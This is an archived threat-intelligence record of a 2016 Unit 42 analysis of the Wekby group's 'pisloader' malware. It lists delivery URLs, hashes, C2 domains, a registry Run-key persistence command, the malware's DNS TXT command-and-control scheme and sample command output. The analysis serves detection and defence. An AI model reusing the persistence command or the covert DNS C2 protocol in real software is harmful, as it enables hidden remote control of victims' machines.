{ "id": "eaade02c-a734-49c0-95e2-2769a7a0b4bd", "created_at": "2026-04-06T00:16:23.573232Z", "updated_at": "2026-04-10T03:27:54.078517Z", "deleted_at": null, "sha1_hash": "837a94aac33707f2cde501d7c9506902602ee2fd", "title": "New Wekby Attacks Use DNS Requests As Command and Control Mechanism", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 729038, "plain_text": "New Wekby Attacks Use DNS Requests As Command and Control\r\nMechanism\r\nBy Josh Grunzweig, Mike Scott, Bryan Lee\r\nPublished: 2016-05-24 · Archived: 2026-04-05 22:39:29 UTC\r\nWe have observed an attack led by the APT group Wekby targeting a US-based organization in recent weeks.\r\nWekby is a group that has been active for a number of years, targeting various industries such as healthcare,\r\ntelecommunications, aerospace, defense, and high tech. The group is known to leverage recently released exploits\r\nvery shortly after those exploits are available, such as in the case of HackingTeam’s Flash zero-day exploit.\r\nThe malware used by the Wekby group has ties to the HTTPBrowser malware family, and uses DNS requests as a\r\ncommand and control mechanism. Additionally, it uses various obfuscation techniques to thwart researchers\r\nduring analysis. Based on metadata seen in the discussed samples, Palo Alto Networks has named this malware\r\nfamily ‘pisloader’.\r\nInfrastructure\r\nThe pisloader malware family was delivered via HTTP from the following URL. At the time of writing, this URL\r\nwas still active.\r\nhttp://globalprint-us[.]com/proxy_plugin.exe \r\nOther samples hosted on this domain include the following:\r\nhttp://globalprint-us[.]com/proxy_web_plugin.exe \r\nMD5: E4968C8060EA017B5E5756C16B80B012\r\nSHA256: 8FFBB7A80EFA9EE79E996ABDE7A95CF8DC6F9A41F9026672A8DBD95539FEA82A\r\nSize: 126976 Bytes\r\nCompile Time: 2016-04-28 00:38:46 UTC\r\nThis discovered file was found to be an instance of the common Poison Ivy malware family with the following\r\nconfiguration data:\r\nCommand and Control Address: intranetwabcam[.]com\r\nCommand and Control Port: 80\r\nPassword: admin\r\nMutex: )!VoqA.I5\r\nThe domains witnessed in this attack were all registered very shortly prior to being used. The following domains\r\nhave been witnessed in this attack:\r\nhttps://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/\r\nPage 1 of 10\n\nAdditionally, the following IP resolutions have been observed.\r\nInitial Dropper\r\nThe following sample was discovered initially and is referenced in the subsequent analysis:\r\nMD5: E8D58AA76DD97536AC225949A2767E05\r\nSHA256: DA3261C332E72E4C1641CA0DE439AF280E064B224D950817A11922A8078B11F1\r\nSize: 126976 Bytes\r\nCompile Time: 2016-04-27 14:37:34 UTC\r\nThis particular file has the following metadata properties. The references to ‘pisload2’ led to the naming of this\r\nmalware family.\r\nhttps://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/\r\nPage 2 of 10\n\nFigure 1 pisloader dropper metadata\r\nThe initial dropper contains very simple code that is responsible for setting persistence via the Run registry key,\r\nand dropping and executing an embedded Windows executable. Limited obfuscation was encountered, where the\r\nauthors split up strings into smaller sub-strings and used ‘strcpy’ and ‘strcat’ calls to re-build them prior to use.\r\nThey also used this same technique to generate garbage strings that are never used. This is likely to deter detection\r\nand analysis of the sample. The following decompiled code demonstrates this. Comments have been added to\r\nshow the fully-generated strings.\r\nhttps://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/\r\nPage 3 of 10\n\nFigure 2 pisloader dropper building strings and setting persistence\r\nIn the above decompiled code, we see that the pisloader is generating the following string, which eventually is\r\ncalled to set the Run registry key.\r\ncmd.exe /c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v lsm /t reg_sz /d\r\n\"%appdata%\\lsm.exe\" /f\r\nThis particular command will set the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\lsm registry key\r\nwith a value of “%appdata%\\lsm.exe”. After this key is set, the malware proceeds to decrypt a two blobs of data\r\nwith a single-byte XOR key of 0x54. The resulting data is written to the %appdata%\\lsm.exe file path.\r\nAfter this file is written, the malware executes the newly written lsm.exe file, which contains the pisloader\r\npayload.\r\nPayload\r\nThe following sample was discovered and is referenced in the subsequent analysis:\r\nMD5: 07B9B62FB3B1C068837C188FEFBD5DE9\r\nSHA256: 456FFFC256422AD667CA023D694494881BAED1496A3067485D56ECC8FEFBFAEB\r\nSize: 102400 Bytes\r\nCompile Timestamp: 2016-04-27 13:39:02 UTC\r\nThe payload is heavily obfuscated using a return-oriented programming (ROP) technique, as well as a number of\r\ngarbage assembly instructions. In the example below, code highlighted in red essentially serves no purpose other\r\nthan to deter reverse-engineering of the sample. This code can be treated as garbage and ignored. The entirety of\r\nthe function is highlighted in green, where two function offsets are pushed to the stack, followed by a return\r\ninstruction. This return instruction will point code execution first at the null function, which in turn will point code\r\nexecution to the ‘next_function’. This technique is used throughout the runtime of the payload, making static\r\nanalysis difficult.\r\nhttps://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/\r\nPage 4 of 10\n\nFigure 3 Obfuscated code witnessed in pisloader\r\nThe malware is actually quite simplistic once the obfuscation and garbage code is ignored. It will begin by\r\ngenerating a random 10-byte alpha-numeric header. The remaining data is base32-encoded, with padding\r\nremoved. This data will be used to populate a subdomain that will be used in a subsequent DNS request for a TXT\r\nrecord.\r\nhttps://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/\r\nPage 5 of 10\n\nThe use of DNS as a C2 protocol has historically not been widely adopted by malware authors. Notable\r\nexceptions include the following:\r\nFrameworkPOS\r\nC3PRO-RACCOON\r\nFeederBot\r\nMorto\r\nPlugX Variants\r\nThe use of DNS as a C2 allows pisloader to bypass certain security products that may not be inspecting this traffic\r\ncorrectly.\r\nFigure 4 DNS query for TXT record by malware\r\nThe pisloader sample will send a beacon periodically that is composed of a random 4-byte uppercase string that is\r\nused as the payload. An example of this can be found below:\r\nFigure 5 pisloader DNS beacon request\r\nThe malware expects various aspects of the DNS responses to be set in a specific way, or else pisloader will\r\nignore the DNS reply. The following DNS flags must be set. Should any additional flags be set, the response will\r\nbe ignored.\r\nResponse\r\nRecursion Desired\r\nhttps://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/\r\nPage 6 of 10\n\nRecursion Available\r\nThe ‘Questions’ field must be set to a value of 0x1. The ‘Answer Resource Records’ field must be set to a value of\r\n0x1. Additionally, the response query subdomain must match the original DNS request.\r\nThe remote command and control (C2) server is statically embedded within the malware. A single host of\r\n‘ns1.logitech-usa[.]com’ is found in this specific sample.\r\nThe C2 server will respond with a TXT record that is encoded similar to the initial request. In the response, the\r\nfirst byte is ignored, and the remaining data is base32-encoded. An example of this can be found below.\r\nFigure 6 Example TXT response by C2 server\r\nThe following commands, and their descriptions are supported by the malware:\r\nsifo – Collect victim system information\r\ndrive – List drives on victim machine\r\nlist – List file information for provided directory\r\nupload – Upload a file to the victim machine\r\nopen – Spawn a command shell\r\nSome examples of these commands being used can be seen below. A mock DNS server was used to generate the\r\ncommands and receive the resulting data.\r\nExample sending the ‘drive’ command:\r\n1\r\n2\r\n3\r\n[+] Sending Command: drive | Encoded: CMRZGS5TF\r\n[+] Raw Data Received: UMAVMGAGD0IE5FY7CDHJOHYRB2LR6A\r\n[+] Decoded Data Received: A:\\|C:\\|D:\\|\r\nExample sending the ‘open’ command:\r\n1 [+] Sending Command: open | Encoded: CN5YGK3Q\r\nhttps://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/\r\nPage 7 of 10\n\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n[+] Raw Data Received:\r\nULCBMGAGCAJVUWG4TPONXWM5BAK5UW4ZDPO5ZSAW2WMVZHG2LP\r\n[+] Raw Data Received:\r\nATABMGAGCBNYQDMLRRFY3TMMBRLUGQUQ3POB4XE2LHNB2CAKDD\r\n[+] Raw Data Received:\r\nHTPDMGAGCCFEQDEMBQHEQE22LDOJXXG33GOQQEG33SOBXXEYLU\r\n[+] Raw Data Received:\r\nBNJWMGAGCDNFXW4LRAEBAWY3BAOJUWO2DUOMQHEZLTMVZHMZLE\r\n[+] Raw Data Received:\r\nUARCMGAGCEFYGQUDIKIM5FYVLTMVZHGXCKN5ZWQICHOJ2W46TX\r\n[+] Raw Data Received: UJRAMGAGC0MVUWOXCEMVZWW5DPOA7A\r\n[+] Decoded Data Received: Microsoft Windows [Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\r\nC:\\Users\\Josh Grunzweig\\Desktop\u003e\r\nExample sending the ‘sifo’ command:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n[+] Sending Command: sifo | Encoded: CONUWM3Y\r\n[+] Raw Data Received:\r\nFUBWMGAGIANQ6TCNZSFYYTMLRRFYYTKMZGMM6VOSKOFVGEUTCW\r\n[+] Raw Data Received:\r\nPGHRMGAGIBGJHEWSKPJNICAW2KN5ZWQICHOJ2W46TXMVUWOXJG\r\n[+] Raw Data Received: MMAZMGAGI0N46TMLBRFQZTE\r\n[+] Decoded Data Received: l=172.16.1.153\u0026c=WIN-LJLV2NKIOKP [Josh Grunzweig]\u0026o=6,1,32\r\nExample listing the contents of the C:\\ drive:\r\n1\r\n2\r\n3\r\n4\r\n[+] Sending Command: list C:\\ | Encoded: CNRUXG5BAIM5FY\r\n[+] Raw Data Received:\r\nQKTUMGAGLAGB6CIUTFMN4WG3DFFZBGS3T4GIYDCNJPGAZS6MRW\r\n[+] Raw Data Received: EKNPMGAGL0EAYTIORUGA5DKN34GB6DEMS6\r\nhttps://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/\r\nPage 8 of 10\n\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n[+] Raw Data Received:\r\nRKMAMGAGLAGF6GC5LUN5SXQZLDFZRGC5D4GIYDAOJPGA3C6MJQ\r\n[+] Raw Data Received: NMSIMGAGL0EAZDCORUGI5DEMD4GI2HYMZSLY\r\n[+] Raw Data Received:\r\nOHRWMGAGLAGB6EE33POR6DEMBRGUXTAMZPGI3CAMJWHIZDIORQ\r\n[+] Raw Data Received: DPDUMGAGL0GJ6DA7BSGJPA\r\n[+] Raw Data Received:\r\nWIKGMGAGLAGF6GE33PORWWO4T4GIYDCNBPGA3C6MRYEAYDAORS\r\n* Truncated*\r\n[+] Decoded Data Received: 0|$Recycle.Bin|2015/03/26 14:40:57|0|22^1|autoexec.bat|2009/06/10\r\n21:42:20|24|32^0|Boot|2015/03/26 16:24:02|0|22^1|bootmgr|2014/06/28\r\n00:21:34|391640|39^1|BOOTSECT.BAK|2015/03/26 16:35:39|8192|39^1|config.sys|2009/06/10\r\n21:42:20|10|32^0|Documents and Settings|2009/07/14 04:53:55|0|9238^1|Example.log|2016/02/09\r\n20:17:55|0|32^1|pagefile.sys|2016/04/25 14:09:20|1660411904|38^0|PerfLogs|2009/07/14\r\n02:37:05|0|16^0|Program Files|2016/02/29 15:59:43|0|17^0|ProgramData|2016/02/02\r\n17:28:04|0|8210^0|Python27|2016/02/25 16:39:37|0|16^0|Recovery|2015/03/26\r\n14:39:57|0|8214^0|System Volume Information|2016/02/29 16:00:19|0|22^0|Users|2015/03/26\r\n14:39:58|0|17^0|Windows|2016/02/12 10:20:21|0|16^^end^\r\nThe sifo command above uses the printf format string of ‘l=%s\u0026c=%s\u0026o=%s’. This is consistent with previous\r\nversions of HTTPBrowser, which is another malware family frequently used by the Wekby group.\r\nAdditionally, a number of commands themselves, such as the ‘list’, ‘drive’, and ‘upload’ commands are consistent\r\nwith HTTPBrowser. The formatted responses from these commands are also identical. A known HTTPBrowser\r\nsample was spotted with similar metadata as the discussed pisloader sample, which adds further credibility that\r\npisloader is likely a variant of this malware family.\r\nAdditionally, the code used to generate these commands is available via GitHub.\r\nConclusion\r\nThe Wekby group continues to target various high profile organizations using sophisticated malware. The\r\npisloader malware family uses various novel techniques, such as using DNS as a C2 protocol, as well as making\r\nuse of return-oriented programming and other anti-analysis tactics.\r\nPalo Alto Networks customers are protected against this threat in the following ways:\r\nWildFire correctly identifies all pisloader samples as malicious\r\nA pisloader AutoFocus tag has been created in order to track this malware family\r\nAll domains/IPs used in this attack have been flagged as malicious.\r\nhttps://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/\r\nPage 9 of 10\n\nAn IPS rule has been created to detect pisloader DNS traffic\r\nAppendix\r\nExternal Resources\r\nhttps://blog.anomali.com/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop\r\nhttp://www.volexity.com/blog/?p=158\r\nhttps://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage\r\nhttps://www.zscaler.com/blogs/research/chinese-cyber-espionage-apt-group-leveraging-recently-leaked-hacking-team-exploits-target-financial-services-firm\r\nhttps://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html\r\nSHA256 Hashes\r\nda3261c332e72e4c1641ca0de439af280e064b224d950817a11922a8078b11f1\r\n930772d6af8f43f62ea78092914fa8d6b03e8e3360dd4678eec1a3dda17206ed\r\n6852ba95720af64809995e04f4818517ca1bd650bc42ea86d9adfdb018d6b274\r\n9200f80c08b21ebae065141f0367f9c88f8fed896b0b4af9ec30fc98c606129b\r\n4d62caef1ca8f4f9aead7823c95228a52852a1145ca6aaa58ad8493e042aed16\r\n1b341dab023de64598d80456349db146aafe9b9e2ec24490c7d0ac881cecc094\r\n456fffc256422ad667ca023d694494881baed1496a3067485d56ecc8fefbfaeb\r\nDomains\r\nns1.logitech-usa[.]com\r\nglobalprint-us[.]com\r\nintranetwabcam[.]com\r\nlogin.access-mail[.]com\r\nglb.it-desktop[.]com\r\nlocal.it-desktop[.]com\r\nhi.getgo2[.]com\r\nSource: https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanis\r\nm/\r\nhttps://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" ], "report_names": [ "unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism" ], "threat_actors": [ { "id": "17b92337-ca5f-48bb-926b-c93b5e5678a4", "created_at": "2022-10-25T16:07:23.333316Z", "updated_at": "2026-04-10T02:00:04.546474Z", "deleted_at": null, "main_name": "APT 18", "aliases": [ "APT 18", "Dynamite Panda", "G0026", "Red Wraith", "SILVERVIPER", "Satin Typhoon", "Scandium", "TG-0416", "Wekby" ], "source_name": "ETDA:APT 18", "tools": [ "AngryRebel", "AtNow", "Farfli", "Gh0st RAT", "Ghost RAT", "HTTPBrowser", "HttpBrowser RAT", "HttpDump", "Moudour", "Mydoor", "PCRat", "Pisloader", "QUICKBALL", "Roseam", "StickyFingers", "Token Control", "TokenControl", "hcdLoader" ], "source_id": "ETDA", "reports": null }, { "id": "a3687241-9876-477b-aa13-a7c368ffda58", "created_at": "2022-10-25T16:07:24.496902Z", "updated_at": "2026-04-10T02:00:05.010744Z", "deleted_at": null, "main_name": "Hacking Team", "aliases": [], "source_name": "ETDA:Hacking Team", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "c8aefee7-fb57-409b-857e-23e986cb4a56", "created_at": "2023-01-06T13:46:38.285223Z", "updated_at": "2026-04-10T02:00:02.910756Z", "deleted_at": null, "main_name": "APT18", "aliases": [ "SCANDIUM", "PLA Navy", "Wekby", "G0026", "Satin Typhoon", "DYNAMITE PANDA", "TG-0416" ], "source_name": "MISPGALAXY:APT18", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e90c06e4-e3e0-4f46-a3b5-17b84b31da62", "created_at": "2023-01-06T13:46:39.018236Z", "updated_at": "2026-04-10T02:00:03.183123Z", "deleted_at": null, "main_name": "Hacking Team", "aliases": [], "source_name": "MISPGALAXY:Hacking Team", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434583, "ts_updated_at": 1775791674, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/837a94aac33707f2cde501d7c9506902602ee2fd.pdf", "text": "https://archive.orkl.eu/837a94aac33707f2cde501d7c9506902602ee2fd.txt", "img": "https://archive.orkl.eu/837a94aac33707f2cde501d7c9506902602ee2fd.jpg" } }